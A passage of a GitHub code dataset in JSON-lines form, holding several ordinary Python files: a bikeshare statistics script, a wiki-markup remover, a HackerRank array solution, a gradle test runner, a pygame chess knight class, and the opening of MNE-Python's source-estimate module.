sec\".format(total_travel_time_days,total_travel_time_hours,total_travel_time_min,total_travel_time_sec))\n\n # display mean travel time\n mean_travel_time = df['Trip Duration'].mean()\n mean_travel_time_days = int(mean_travel_time//(24*60*60))\n mean_travel_time_hours = int((mean_travel_time%(24*60*60))//(60*60))\n mean_travel_time_min = int(((mean_travel_time%(24*60*60))%(60*60))//60)\n mean_travel_time_sec = int(((mean_travel_time%(24*60*60))%(60*60))%60)\n print(\"Mean Travel Time is: {} days {} hours {} mins {} sec\".format(mean_travel_time_days,mean_travel_time_hours,mean_travel_time_min,mean_travel_time_sec))\n \n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n user_types = df['User Type'].value_counts()\n print('User Types:\\n' + user_types.to_string())\n \n # Display counts of gender\n try:\n gender = df['Gender'].value_counts()\n print('\\nGender:\\n' + gender.to_string())\n # Display earliest, most recent, and most common year of birth\n earliest_year_of_birth = int(df['Birth Year'].min())\n print('\\nEarliest Date of Birth: {}'.format(earliest_year_of_birth))\n most_recent_year_of_birth = int(df['Birth Year'].max())\n print('Most recent Date of Birth: {}'.format(most_recent_year_of_birth))\n most_common_year_of_birth = int(df['Birth Year'].mode()[0])\n print('Most common Date of Birth: {}'.format(most_common_year_of_birth))\n except KeyError:\n print('\\nSorry. Information about Gender and Birth Year is not available for the city of Washington.')\n \n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\ndef raw_data(df):\n \"\"\"\n Asks user if raw data should be displayed. User is asked again if evene more line should be displayed.\n\n Returns:\n Five rows of raw data\n \"\"\"\n x = input('\\nDo you want to see a preview of the Raw Data? Yes or No?\\n ').lower()\n a = 0\n b = 5\n while True:\n if x == 'yes':\n print(df.iloc[a:b])\n a += 5\n b += 5\n elif x == 'no':\n break\n else:\n print('Wrong Input. Try again!')\n x = input('\\nDo you want to see more lines of the data? Yes or No?\\n ').lower()\n \n\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n try: \n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n raw_data(df)\n except KeyError:\n print(\"Sorry there is no data for the filters you selected.\\nSelect one of these month: All, January, February, March, April, May, June \")\n except IndexError:\n print(\"Sorry there is no data for the filters you selected.\\nSelect one of these month: All, January, February, March, April, May, June\")\n except ValueError:\n print(\"Sorry there is no data for the filters you selected.\")\n \n \n restart = input('\\nWould you like to restart? Enter yes or no.\\n')\n if restart.lower() != 'yes':\n break\n\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"sgabriel92/Bikeshare_project_pyhton","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":9521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"16063198161","text":"from dai3syou import No20\nimport re\n\n\ndef remove_markup(str):\n # 強調\n str = re.sub(r\"'{2,5}\", r\"\", str)\n # 内部リンク\n str = re.sub(r\"\\[{2}([^|\\]]+?\\|)*(.+?)\\]{2}\", r\"\\2\", str)\n # 言語を指定した表記\n str = re.sub(r\"\\{{2}.+?\\|.+?\\|(.+?)\\}{2}\", r\"\\1 \", str)\n # コメント\n str = re.sub(r\"<.*?>\", r\"\", str)\n # 外部リンク\n str = re.sub(r\"\\[.*?\\]\", r\"\", str)\n return str\n\n\ntemp_dict = {}\nlines = No20.extract_from_json(u\"イギリス\").split(\"\\n\")\n\nfor line in lines:\n category_line = re.search(\"^\\|(.*?)\\s=\\s(.*)\", line)\n if category_line is not None:\n temp_dict[category_line.group(1)] = remove_markup(category_line.group(2))\n\nfor k, v in sorted(temp_dict.items(), key=lambda x: x[0]):\n print(k, v)\n","repo_name":"take9999/knock100","sub_path":"dai3syou/No25_28.py","file_name":"No25_28.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25533873016","text":"\"\"\"\nGiven two numbers N and M. N indicates the number of elements in the array\nA[](1-indexed) and M indicates number of queries. You need to perform two types of\nqueries on the array A[].\nYou are given M queries. Queries can be of two types, type 1 and type 2.\n * Type 1 queries are represented as 1 i j : Modify the given array by removing\n elements from to and adding them to the front.\n * Type 2 queries are represented as 2 i j : Modify the given array by removing\n elements from to and adding them to the back.\nYour task is to simply print |A[1]-A[N]| of the resulting array after the execution of M\nqueries followed by the resulting array.\nNote While adding at back or front the order of elements is preserved.\nInput Format\n First line consists of two space-separated integers, N and M.\n Second line contains N integers, which represent the elements of the array.\n M queries follow. Each line contains a query of either type 1 or type 2 in the form\n type i j\nConstraints\n 1<=N,M<=10^5\n 1<=A[i]<=10^9\n 1<=i<=j<=N\nOutput Format\n Print the absolute value i.e. abs(A[1]-A[N]) in the first line.\n Print elements of the resulting array in the second line. Each element should be\n seperated by a single space.\nSample Input\n 8 4\n 1 2 3 4 5 6 7 8\n 1 2 4\n 2 3 5\n 1 4 7\n 2 1 4\nSample Output\n 1\n 2 3 6 5 7 8 4 1\nExplanation\n Given array is {1,2,3,4,5,6,7,8}.\n After execution of query 124, the array becomes {2,3,4,1,6,7,8}.\n After execution of query 235, the array becomes{2,3,6,7,8,4,1,5} .\n After execution of query 147, the array becomes {7,8,4,1,2,3,6,5}.\n After execution of query 214, the array becomes {2,3,6,5,7,8,4,1}.\n Now |A[1]-A[N]| is |(2-1)| i.e. 1 and the array is 23657841\n\"\"\"\n\n# Enter your code here. Read input from STDIN. Print output to STDOUT\nfrom array import array\n\nn, n_queries = map(int, input().split())\ndata = array('L', map(int, input().split()))\nassert len(data) == n\nfor m in range(n_queries):\n t, i, j = map(int, input().split())\n if t == 1:\n aux1 = i - 1\n aux2 = j - aux1\n data[:aux2], data[aux2:j] = data[aux1:j], data[:aux1]\n else:\n aux1 = i - 1\n aux2 = aux1 + n - j\n data[aux1:aux2], data[aux2:] = data[j:], data[aux1:j]\nprint(abs(data[0] - data[-1]))\nprint(*data)\n","repo_name":"DanielTLouis/HackerRank","sub_path":"DataStructures/Prepare_DataStructures_BalancedTrees_ArrayAndSimplequeries.py","file_name":"Prepare_DataStructures_BalancedTrees_ArrayAndSimplequeries.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74815934439","text":"import xml.dom.minidom\n\nimport os\n\n\ndef main():\n doc = xml.dom.minidom.parse(\"path/file.xml\");\n print(doc.nodeName)\n print(doc.firstChild.tagName)\n expertise = doc.getElementsByTagName(\"Stacktrace\")\n\n print(len(expertise))\n for skill in expertise:\n print(skill.getAttribute(\"amount\"))\n\ndef files(path):\n for file in os.listdir(path):\n if os.path.isfile(os.path.join(path, file)):\n yield file\n\nif __name__ == \"__main__\":\n # main()\n\n import os\n wd = os.getcwd()\n exe_dir = \"path\"\n os.chdir(exe_dir)\n\n # put everything in demo/ and loop everything in the demo dir\n # file_lst = []\n # for subdir, dirs, files in os.walk(target_dir + 'demo/'):\n # for filename in files:\n # if filename.endswith('gradle'):\n # continue\n # # filepath = subdir + os.sep + filename\n # file_lst.append(filename)\n\n target_dir = 'path'\n file_lst = files(target_dir)\n\n for file in file_lst:\n if file.endswith('gradle'):\n continue\n # a = os.popen(\"/opt/gradle/gradle-6.1/bin/gradle run -s --args='demo/%s'\" % file).read()\n a = os.popen(\"/opt/gradle/gradle-6.1/bin/gradle run -s --args='%s/%s'\" % (target_dir, file)).read()\n for line in a.split('\\n'):\n if 'Stack' in line:\n if int(line[0]) > 0:\n print('True')\n else:\n print('False')\n\n\n # a = os.popen(\"/opt/gradle/gradle-6.1/bin/gradle run --args='demo/demo.txt'\").read()\n print('----------')\n # print(a)\n os.chdir(wd)\n\n # works for gradle\n # os.system(\"/opt/gradle/gradle-6.1/bin/gradle run --args='demo/demo.txt'\")\n\n # doesn't work for gradle\n # subprocess.Popen(\"/opt/gradle/gradle-6.1/bin/gradle run\")\n # subprocess.Popen(\"gradle run --args='demo/demo.txt'\")\n # subprocess.Popen(\"ls\")\n\n # doesn't work for gradle\n # proc = subprocess.Popen([\"/opt/gradle/gradle-6.1/bin/gradle\", \"run\", \"--args='demo/demo.txt\"],\n # stdout=subprocess.PIPE, shell=True)\n # (out, err) = proc.communicate()\n # print(\"program output:\", out)\n","repo_name":"FalconLK/DigBug-Dig-into-Bug","sub_path":"infozilla.py","file_name":"infozilla.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"31536048563","text":"from typing import List, Tuple\nimport pygame\n\nfrom Pieces.ChessPiece import ChessPiece\nfrom Utils.Colours import Colour\n\n\nclass Horse(ChessPiece):\n def __init__(self, screen: pygame.Surface, colour: Colour, pos: Tuple[int, int], board: List[List[ChessPiece]]):\n super().__init__(screen, colour, pos, board)\n\n @property\n def validMoves(self) -> List[Tuple[int, int]]:\n moves = []\n\n def check(x, y):\n try:\n other = self._board[self.y + y][self.x + x]\n if other is None or other.colour != self.colour:\n moves.append((self.x + x, self.y + y))\n except IndexError:\n pass\n\n check(1, 2)\n check(2, 1)\n check(-1, -2)\n check(-2, -1)\n check(1, -2)\n check(2, -1)\n check(-1, 2)\n check(-2, 1)\n\n return moves\n\n def draw(self, xy: Tuple[int, int], size: int, selected: bool = False):\n if selected:\n pygame.draw.circle(self._screen, Colour.green.value, xy, size)\n else:\n pygame.draw.circle(self._screen, self.colour.value, xy, size)\n pygame.draw.circle(self._screen, Colour.gray.value, xy, size, 4) # Outline\n","repo_name":"Jodh/ChessGame","sub_path":"Pieces/Horse.py","file_name":"Horse.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27337464291","text":"# Authors: Alexandre Gramfort \n# Matti Hämäläinen \n# Martin Luessi \n# Mads Jensen \n#\n# License: BSD (3-clause)\n\nimport contextlib\nimport copy\nimport os.path as op\nimport numpy as np\nfrom scipy import linalg, sparse\nfrom scipy.sparse import coo_matrix, block_diag as sparse_block_diag\n\nfrom .cov import Covariance\nfrom .evoked import _get_peak\nfrom .filter import resample\nfrom .fixes import einsum\nfrom .surface import read_surface, _get_ico_surface, mesh_edges\nfrom .source_space import (_ensure_src, _get_morph_src_reordering,\n _ensure_src_subject, SourceSpaces, _get_src_nn)\nfrom .utils import (get_subjects_dir, _check_subject, logger, verbose,\n _time_mask, warn as warn_, copy_function_doc_to_method_doc,\n fill_doc, _check_option, _validate_type, _check_src_normal,\n _check_stc_units, _check_pandas_installed,\n _check_pandas_index_arguments, _convert_times,\n _build_data_frame, _check_time_format, _check_scaling_time)\nfrom .viz import (plot_source_estimates, plot_vector_source_estimates,\n plot_volume_source_estimates)\nfrom .io.base import TimeMixin\nfrom .io.meas_info import Info\nfrom .externals.h5io import read_hdf5, write_hdf5\n\n\ndef _read_stc(filename):\n \"\"\"Aux Function.\"\"\"\n with open(filename, 'rb') as fid:\n buf = fid.read()\n\n stc = dict()\n offset = 0\n num_bytes = 4\n\n # read tmin in ms\n stc['tmin'] = float(np.frombuffer(buf, dtype=\">f4\", count=1,\n offset=offset))\n stc['tmin'] /= 1000.0\n offset += num_bytes\n\n # read sampling rate in ms\n stc['tstep'] = float(np.frombuffer(buf, dtype=\">f4\", count=1,\n offset=offset))\n stc['tstep'] /= 1000.0\n offset += num_bytes\n\n # read number of vertices/sources\n vertices_n = int(np.frombuffer(buf, dtype=\">u4\", count=1, offset=offset))\n offset += num_bytes\n\n # read the source vector\n stc['vertices'] = np.frombuffer(buf, dtype=\">u4\", count=vertices_n,\n offset=offset)\n offset += num_bytes * vertices_n\n\n # read the number of timepts\n data_n = int(np.frombuffer(buf, dtype=\">u4\", count=1, offset=offset))\n offset += num_bytes\n\n if (vertices_n and # vertices_n can be 0 (empty stc)\n ((len(buf) // 4 - 4 - vertices_n) % (data_n * vertices_n)) != 0):\n raise ValueError('incorrect stc file size')\n\n # read the data matrix\n stc['data'] = np.frombuffer(buf, dtype=\">f4\", count=vertices_n * data_n,\n offset=offset)\n stc['data'] = stc['data'].reshape([data_n, vertices_n]).T\n\n return stc\n\n\ndef _write_stc(filename, tmin, tstep, vertices, data):\n \"\"\"Write an STC file.\n\n Parameters\n ----------\n filename : string\n The name of the STC file.\n tmin : float\n The first time point of the data in seconds.\n tstep : float\n Time between frames in seconds.\n vertices : array of integers\n Vertex indices (0 based).\n data : 2D array\n The data matrix (nvert * ntime).\n \"\"\"\n fid = open(filename, 'wb')\n\n # write start time in ms\n fid.write(np.array(1000 * tmin, dtype='>f4').tostring())\n # write sampling rate in ms\n fid.write(np.array(1000 * tstep, dtype='>f4').tostring())\n # write number of vertices\n fid.write(np.array(vertices.shape[0], dtype='>u4').tostring())\n # write the vertex indices\n fid.write(np.array(vertices, dtype='>u4').tostring())\n\n # write the number of timepts\n fid.write(np.array(data.shape[1], dtype='>u4').tostring())\n #\n # write the data\n #\n fid.write(np.array(data.T, dtype='>f4').tostring())\n\n # close the file\n fid.close()\n\n\ndef _read_3(fid):\n \"\"\"Read 3 byte integer from file.\"\"\"\n data = np.fromfile(fid, dtype=np.uint8, count=3).astype(np.int32)\n\n out = np.left_shift(data[0], 16) + np.left_shift(data[1], 8) + data[2]\n\n return out\n\n\ndef _read_w(filename):\n \"\"\"Read a w file.\n\n w files contain activations or source reconstructions for a single time\n point.\n\n Parameters\n ----------\n filename : string\n The name of the w file.\n\n Returns\n -------\n data: dict\n The w structure. It has the following keys:\n vertices vertex indices (0 based)\n data The data matrix (nvert long)\n \"\"\"\n with open(filename, 'rb', buffering=0) as fid: # buffering=0 for np bug\n # skip first 2 bytes\n fid.read(2)\n\n # read number of vertices/sources (3 byte integer)\n vertices_n = int(_read_3(fid))\n\n vertices = np.zeros((vertices_n), dtype=np.int32)\n data = np.zeros((vertices_n), dtype=np.float32)\n\n # read the vertices and data\n for i in range(vertices_n):\n vertices[i] = _read_3(fid)\n data[i] = np.fromfile(fid, dtype='>f4', count=1)[0]\n\n w = dict()\n w['vertices'] = vertices\n w['data'] = data\n\n return w\n\n\ndef _write_3(fid, val):\n \"\"\"Write 3 byte integer to file.\"\"\"\n f_bytes = np.zeros((3), dtype=np.uint8)\n f_bytes[0] = (val >> 16) & 255\n f_bytes[1] = (val >> 8) & 255\n f_bytes[2] = val & 255\n fid.write(f_bytes.tostring())\n\n\ndef _write_w(filename, vertices, data):\n \"\"\"Write a w file.\n\n w files contain activations or source reconstructions for a single time\n point.\n\n Parameters\n ----------\n filename: string\n The name of the w file.\n vertices: array of int\n Vertex indices (0 based).\n data: 1D array\n The data array (nvert).\n \"\"\"\n assert (len(vertices) == len(data))\n\n fid = open(filename, 'wb')\n\n # write 2 zero bytes\n fid.write(np.zeros((2), dtype=np.uint8).tostring())\n\n # write number of vertices/sources (3 byte integer)\n vertices_n = len(vertices)\n _write_3(fid, vertices_n)\n\n # write the vertices and data\n for i in range(vertices_n):\n _write_3(fid, vertices[i])\n # XXX: without float() endianness is wrong, not sure why\n fid.write(np.array(float(data[i]), dtype='>f4').tostring())\n\n # close the file\n fid.close()\n\n\ndef read_source_estimate(fname, subject=None):\n \"\"\"Read a source estimate object.\n\n Parameters\n ----------\n fname : str\n Path to (a) source-estimate file(s).\n subject : str | None\n Name of the subject the source estimate(s) is (are) from.\n It is good practice to set this attribute to avoid combining\n incompatible labels and SourceEstimates (e.g., ones from other\n subjects). Note that due to file specification limitations, the\n subject name isn't saved to or loaded from files written to disk.\n\n Returns\n -------\n stc : SourceEstimate | VectorSourceEstimate | VolSourceEstimate | MixedSourceEstimate\n The source estimate object loaded from file.\n\n Notes\n -----\n - for volume source estimates, ``fname`` should provide the path to a\n single file named '*-vl.stc` or '*-vol.stc'\n - for surface source estimates, ``fname`` should either provide the\n path to the file corresponding to a single hemisphere ('*-lh.stc',\n '*-rh.stc') or only specify the asterisk part in these patterns. In any\n case, the function expects files for both hemisphere with names\n following this pattern.\n - for vector surface source estimates, only HDF5 files are supported.\n - for mixed source estimates, only HDF5 files are supported.\n - for single time point .w files, ``fname`` should follow the same\n pattern as for surface estimates, except that files are named\n '*-lh.w' and '*-rh.w'.\n \"\"\" # noqa: E501\n fname_arg = fname\n _validate_type(fname, 'path-like', 'fname')\n fname = str(fname)\n\n # make sure corresponding file(s) can be found\n ftype = None\n if op.exists(fname):\n if fname.endswith('-vl.stc') or fname.endswith('-vol.stc') or \\\n fname.endswith('-vl.w') or fname.endswith('-vol.w'):\n ftype = 'volume'\n elif fname.endswith('.stc'):\n ftype = 'surface'\n if fname.endswith(('-lh.stc', '-rh.stc')):\n fname = fname[:-7]\n else:\n err = (\"Invalid .stc filename: %r; needs to end with \"\n \"hemisphere tag ('...-lh.stc' or '...-rh.stc')\"\n % fname)\n raise IOError(err)\n elif fname.endswith('.w'):\n ftype = 'w'\n if fname.endswith(('-lh.w', '-rh.w')):\n fname = fname[:-5]\n else:\n err = (\"Invalid .w filename: %r; needs to end with \"\n \"hemisphere tag ('...-lh.w' or '...-rh.w')\"\n % fname)\n raise IOError(err)\n elif fname.endswith('.h5'):\n ftype = 'h5'\n fname = fname[:-3]\n else:\n raise RuntimeError('Unknown extension for file %s' % fname_arg)\n\n if ftype != 'volume':\n stc_exist = [op.exists(f)\n for f in [fname + '-rh.stc', fname + '-lh.stc']]\n w_exist = [op.exists(f)\n for f in [fname + '-rh.w', fname + '-lh.w']]\n if all(stc_exist) and ftype != 'w':\n ftype = 'surface'\n elif all(w_exist):\n ftype = 'w'\n elif op.exists(fname + '.h5'):\n ftype = 'h5'\n elif op.exists(fname + '-stc.h5'):\n ftype = 'h5'\n fname += '-stc'\n elif any(stc_exist) or any(w_exist):\n raise IOError(\"Hemisphere missing for %r\" % fname_arg)\n else:\n raise IOError(\"SourceEstimate File(s) not found for: %r\"\n % fname_arg)\n\n # read the files\n if ftype == 'volume': # volume source space\n if fname.endswith('.stc'):\n kwargs = _read_stc(fname)\n elif fname.endswith('.w'):\n kwargs = _read_w(fname)\n kwargs['data'] = kwargs['data'][:, np.newaxis]\n kwargs['tmin'] = 0.0\n kwargs['tstep'] = 0.0\n else:\n raise IOError('Volume source estimate must end with .stc or .w')\n elif ftype == 'surface': # stc file with surface source spaces\n lh = _read_stc(fname + '-lh.stc')\n rh = _read_stc(fname + '-rh.stc')\n assert lh['tmin'] == rh['tmin']\n assert lh['tstep'] == rh['tstep']\n kwargs = lh.copy()\n kwargs['data'] = np.r_[lh['data'], rh['data']]\n kwargs['vertices'] = [lh['vertices'], rh['vertices']]\n elif ftype == 'w': # w file with surface source spaces\n lh = _read_w(fname + '-lh.w')\n rh = _read_w(fname + '-rh.w')\n kwargs = lh.copy()\n kwargs['data'] = np.atleast_2d(np.r_[lh['data'], rh['data']]).T\n kwargs['vertices'] = [lh['vertices'], rh['vertices']]\n # w files only have a single time point\n kwargs['tmin'] = 0.0\n kwargs['tstep'] = 1.0\n ftype = 'surface'\n elif ftype == 'h5':\n kwargs = read_hdf5(fname + '.h5', title='mnepython')\n ftype = kwargs.pop('src_type', 'surface')\n\n if ftype != 'volume':\n # Make sure the vertices are ordered\n vertices = kwargs['vertices']\n if any(np.any(np.diff(v.astype(int)) <= 0) for v in vertices):\n sidx = [np.argsort(verts) for verts in vertices]\n vertices = [verts[idx] for verts, idx in zip(vertices, sidx)]\n data = kwargs['data'][np.r_[sidx[0], len(sidx[0]) + sidx[1]]]\n kwargs['vertices'] = vertices\n kwargs['data'] = data\n\n if 'subject' not in kwargs:\n kwargs['subject'] = subject\n if subject is not None and subject != kwargs['subject']:\n raise RuntimeError('provided subject name \"%s\" does not match '\n 'subject name from the file \"%s'\n % (subject, kwargs['subject']))\n\n vector = kwargs['data'].ndim == 3\n if ftype in ('volume', 'discrete'):\n klass = VolVectorSourceEstimate if vector else VolSourceEstimate\n elif ftype == 'mixed':\n if vector:\n # XXX we should really support this at some point\n raise NotImplementedError('Vector mixed source estimates not yet '\n 'supported')\n klass = MixedSourceEstimate\n else:\n assert ftype == 'surface'\n klass = VectorSourceEstimate if vector else SourceEstimate\n return klass(**kwargs)\n\n\ndef _get_src_type(src, vertices, warn_text=None):\n src_type = None\n if src is None:\n if warn_text is None:\n warn_(\"src should not be None for a robust guess of stc type.\")\n else:\n warn_(warn_text)\n if isinstance(vertices, list) and len(vertices) == 2:\n src_type = 'surface'\n elif isinstance(vertices, np.ndarray) or isinstance(vertices, list) \\\n and len(vertices) == 1:\n src_type = 'volume'\n elif isinstance(vertices, list) and len(vertices) > 2:\n src_type = 'mixed'\n else:\n src_type = src.kind\n assert src_type in ('surface', 'volume', 'mixed', 'discrete')\n return src_type\n\n\ndef _make_stc(data, vertices, src_type=None, tmin=None, tstep=None,\n subject=None, vector=False, source_nn=None, warn_text=None):\n \"\"\"Generate a surface, vector-surface, volume or mixed source estimate.\"\"\"\n def guess_src_type():\n return _get_src_type(src=None, vertices=vertices, warn_text=warn_text)\n\n src_type = guess_src_type() if src_type is None else src_type\n\n if vector and src_type == 'mixed': # XXX this should be supported someday\n raise NotImplementedError(\n 'Vector source estimates for mixed source spaces are not supported'\n )\n\n if vector and src_type == 'surface' and source_nn is None:\n raise RuntimeError('No source vectors supplied.')\n\n # infer Klass from src_type\n if src_type == 'surface':\n Klass = VectorSourceEstimate if vector else SourceEstimate\n elif src_type in ('volume', 'discrete'):\n Klass = VolVectorSourceEstimate if vector else VolSourceEstimate\n elif src_type == 'mixed':\n Klass = MixedSourceEstimate\n else:\n raise ValueError('vertices has to be either a list with one or more '\n 'arrays or an array')\n\n # massage the data\n if src_type == 'surface' and vector:\n n_vertices = len(vertices[0]) + len(vertices[1])\n data = np.matmul(\n np.transpose(source_nn.reshape(n_vertices, 3, 3), axes=[0, 2, 1]),\n data.reshape(n_vertices, 3, -1)\n )\n elif src_type in ('volume', 'discrete') and vector:\n data = data.reshape((-1, 3, data.shape[-1]))\n else:\n pass # noqa\n\n return Klass(\n data=data, vertices=vertices, tmin=tmin, tstep=tstep, subject=subject\n )\n\n\ndef _verify_source_estimate_compat(a, b):\n \"\"\"Make sure two SourceEstimates are compatible for arith. operations.\"\"\"\n compat = False\n if type(a) != type(b):\n raise ValueError('Cannot combine %s and %s.' % (type(a), type(b)))\n if len(a.vertices) == len(b.vertices):\n if all(np.array_equal(av, vv)\n for av, vv in zip(a.vertices, b.vertices)):\n compat = True\n if not compat:\n raise ValueError('Cannot combine source estimates that do not have '\n 'the same vertices. Consider using stc.expand().')\n if a.subject != b.subject:\n raise ValueError('source estimates do not have the same subject '\n 'names, %r and %r' % (a.subject, b.subject))\n\n\nclass _BaseSourceEstimate(TimeMixin):\n \"\"\"Base class for all source estimates.\n\n Parameters\n ----------\n data : array, shape (n_dipoles, n_times) | tuple, shape (2,)\n The data in source space. The data can either be a single array or\n a tuple with two arrays: \"kernel\" shape (n_vertices, n_sensors) and\n \"sens_data\" shape (n_sensors, n_times). In this case, the source\n space data corresponds to ``np.dot(kernel, sens_data)``.\n vertices : array | list of array\n Vertex numbers corresponding to the data.\n tmin : float\n Time point of the first sample in data.\n tstep : float\n Time step between successive samples in data.\n subject : str | None\n The subject name. While not necessary, it is safer to set the\n subject parameter to avoid analysis errors.\n %(verbose)s\n\n Attributes\n ----------\n subject : str | None\n The subject name.\n times : array, shape (n_times,)\n The time vector.\n vertices : array | list of array of shape (n_dipoles,)\n The indices of the dipoles in the different source spaces. Can\n be an array if there is only one source space (e.g., for volumes).\n data : array of shape (n_dipoles, n_times)\n The data in source space.\n shape : tuple\n The shape of the data. A tuple of int (n_dipoles, n_times).\n \"\"\"\n\n @verbose\n def __init__(self, data, vertices=None, tmin=None, tstep=None,\n subject=None, verbose=None): # noqa: D102\n assert hasattr(self, '_data_ndim'), self.__class__.__name__\n assert hasattr(self, '_src_type'), self.__class__.__name__\n kernel, sens_data = None, None\n if isinstance(data, tuple):\n if len(data) != 2:\n raise ValueError('If data is a tuple it has to be length 2')\n kernel, sens_data = data\n data = None\n if kernel.shape[1] != sens_data.shape[0]:\n raise ValueError('kernel (%s) and sens_data (%s) have invalid '\n 'dimensions'\n % (kernel.shape, sens_data.shape))\n if sens_data.ndim != 2:\n raise ValueError('The sensor data must have 2 dimensions, got '\n '%s' % (sens_data.ndim,))\n\n if isinstance(vertices, list):\n vertices = [np.asarray(v, int) for v in vertices]\n if any(np.any(np.diff(v.astype(int)) <= 0) for v in vertices):\n raise ValueError('Vertices must be ordered in increasing '\n 'order.')\n\n n_src = sum([len(v) for v in vertices])\n\n if len(vertices) == 1:\n vertices = vertices[0]\n elif isinstance(vertices, np.ndarray):\n n_src = len(vertices)\n else:\n raise ValueError('Vertices must be a list or numpy array')\n\n # safeguard the user against doing something silly\n if data is not None:\n if data.shape[0] != n_src:\n raise ValueError('Number of vertices (%i) and stc.shape[0] '\n '(%i) must match' % (n_src, data.shape[0]))\n if data.ndim == self._data_ndim - 1: # allow upbroadcasting\n data = data[..., np.newaxis]\n if data.ndim != self._data_ndim:\n raise ValueError('Data (shape %s) must have %s dimensions for '\n '%s' % (data.shape, self._data_ndim,\n self.__class__.__name__))\n\n self._data = data\n self._tmin = tmin\n self._tstep = tstep\n self.vertices = vertices\n self.verbose = verbose\n self._kernel = kernel\n self._sens_data = sens_data\n self._kernel_removed = False\n self._times = None\n self._update_times()\n self.subject = _check_subject(None, subject, False)\n\n def __repr__(self): # noqa: D105\n s = \"%d vertices\" % (sum(len(v) for v in self._vertices_list),)\n if self.subject is not None:\n s += \", subject : %s\" % self.subject\n s += \", tmin : %s (ms)\" % (1e3 * self.tmin)\n s += \", tmax : %s (ms)\" % (1e3 * self.times[-1])\n s += \", tstep : %s (ms)\" % (1e3 * self.tstep)\n s += \", data shape : %s\" % (self.shape,)\n return \"<%s | %s>\" % (type(self).__name__, s)\n\n @property\n def _vertices_list(self):\n return self.vertices\n\n @verbose\n def save(self, fname, ftype='h5', verbose=None):\n \"\"\"Save the full source estimate to an HDF5 file.\n\n Parameters\n ----------\n fname : str\n The file name to write the source estimate to, should end in\n '-stc.h5'.\n ftype : str\n File format to use. Currently, the only allowed values is \"h5\".\n %(verbose_meth)s\n \"\"\"\n _validate_type(fname, 'path-like', 'fname')\n fname = str(fname)\n if ftype != 'h5':\n raise ValueError('%s objects can only be written as HDF5 files.'\n % (self.__class__.__name__,))\n if not fname.endswith('.h5'):\n fname += '-stc.h5'\n write_hdf5(fname,\n dict(vertices=self.vertices, data=self.data, tmin=self.tmin,\n tstep=self.tstep, subject=self.subject,\n src_type=self._src_type),\n title='mnepython', overwrite=True)\n\n @property\n def sfreq(self):\n \"\"\"Sample rate of the data.\"\"\"\n return 1. / self.tstep\n\n def _remove_kernel_sens_data_(self):\n \"\"\"Remove kernel and sensor space data and compute self._data.\"\"\"\n if self._kernel is not None or self._sens_data is not None:\n self._kernel_removed = True\n self._data = np.dot(self._kernel, self._sens_data)\n self._kernel = None\n self._sens_data = None\n\n @fill_doc\n def crop(self, tmin=None, tmax=None, include_tmax=True):\n \"\"\"Restrict SourceEstimate to a time interval.\n\n Parameters\n ----------\n tmin : float | None\n The first time point in seconds. If None the first present is used.\n tmax : float | None\n The last time point in seconds. If None the last present is used.\n %(include_tmax)s\n\n Returns\n -------\n stc : instance of SourceEstimate\n The cropped source estimate.\n \"\"\"\n mask = _time_mask(self.times, tmin, tmax, sfreq=self.sfreq,\n include_tmax=include_tmax)\n self.tmin = self.times[np.where(mask)[0][0]]\n if self._kernel is not None and self._sens_data is not None:\n self._sens_data = self._sens_data[..., mask]\n else:\n self.data = self.data[..., mask]\n\n return self # return self for chaining methods\n\n @verbose\n def resample(self, sfreq, npad='auto', window='boxcar', n_jobs=1,\n verbose=None):\n \"\"\"Resample data.\n\n Parameters\n ----------\n sfreq : float\n New sample rate to use.\n npad : int | str\n Amount to pad the start and end of the data.\n Can also be \"auto\" to use a padding that will result in\n a power-of-two size (can be much faster).\n window : str | tuple\n Window to use in resampling. See :func:`scipy.signal.resample`.\n %(n_jobs)s\n %(verbose_meth)s\n\n Returns\n -------\n stc : instance of SourceEstimate\n The resampled source estimate.\n\n Notes\n -----\n For some data, it may be more accurate to use npad=0 to reduce\n artifacts. This is dataset dependent -- check your data!\n\n Note that the sample rate of the original data is inferred from tstep.\n \"\"\"\n # resampling in sensor instead of source space gives a somewhat\n # different result, so we don't allow it\n self._remove_kernel_sens_data_()\n\n o_sfreq = 1.0 / self.tstep\n data = self.data\n if data.dtype == np.float32:\n data = data.astype(np.float64)\n self.data = resample(data, sfreq, o_sfreq, npad, n_jobs=n_jobs)\n\n # adjust indirectly affected variables\n self.tstep = 1.0 / sfreq\n return self\n\n @property\n def data(self):\n \"\"\"Numpy array of source estimate data.\"\"\"\n if self._data is None:\n # compute the solution the first time the data is accessed and\n # remove the kernel and sensor data\n self._remove_kernel_sens_data_()\n return self._data\n\n @data.setter\n def data(self, value):\n value = np.asarray(value)\n if self._data is not None and value.ndim != self._data.ndim:\n raise ValueError('Data array should have %d dimensions.' %\n self._data.ndim)\n\n # vertices can be a single number, so cast to ndarray\n if isinstance(self.vertices, list):\n n_verts = sum([len(v) for v in self.vertices])\n elif isinstance(self.vertices, np.ndarray):\n n_verts = len(self.vertices)\n else:\n raise ValueError('Vertices must be a list or numpy array')\n\n if value.shape[0] != n_verts:\n raise ValueError('The first dimension of the data array must '\n 'match the number of vertices (%d != %d)' %\n (value.shape[0], n_verts))\n\n self._data = value\n self._update_times()\n\n @property\n def shape(self):\n \"\"\"Shape of the data.\"\"\"\n if self._data is not None:\n return self._data.shape\n 